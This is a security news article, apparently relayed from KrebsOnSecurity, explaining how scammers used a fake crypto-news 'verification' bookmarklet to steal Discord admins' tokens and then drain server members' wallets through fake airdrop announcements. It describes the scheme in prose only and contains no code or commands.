This past month, a number of Discord groups that were centered on cryptocurrencies were compromised after the administrators of such communities were duped into executing malicious Javascript code that was disguised as a Web browser bookmark according to krebsonsecurity website. According to interviews conducted with victims, some of the attacks started with a request for an interview made by someone pretending to be a reporter for an online news organization that focuses on cryptocurrency. Those who fall for the scam are given a link to a Discord server that seems to be the official one for the cryptocurrency news website. Once there, they are requested to complete a verification step so that their identities may be confirmed.
The verification procedure requires moving a button from the fake crypto news Discord server to the bookmarks bar in one’s web browser, as seen in this video that can be found on Youtube. After reaching that page, the visitor will see instructions telling them to return to discord.com, where they must then click the new bookmark in order to finish the verification procedure.
However, the bookmark is really a devious piece of Javascript that stealthily takes the user’s Discord token and transmits it to the website of the con artist. The attacker then loads the stolen token into their own browser session and (often late at night after the administrators have gone to sleep) writes an announcement in the targeted Discord touting an exclusive “airdrop,” “NFT mint event,” or any other prospective money generating opportunity for the users of the Discord.
When unwary users of Discord follow the link supplied by the hijacked administrator account, they are requested to connect their cryptocurrency wallet to the scammer’s site. Once connected, the scammer’s site requests limitless spend permissions on the members’ tokens and then empties the balance of any valued accounts.
In the meanwhile, any user in the hijacked Discord channel who is aware of the fraud and responds to it will have their account terminated, and the compromised admin account will erase their communications.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.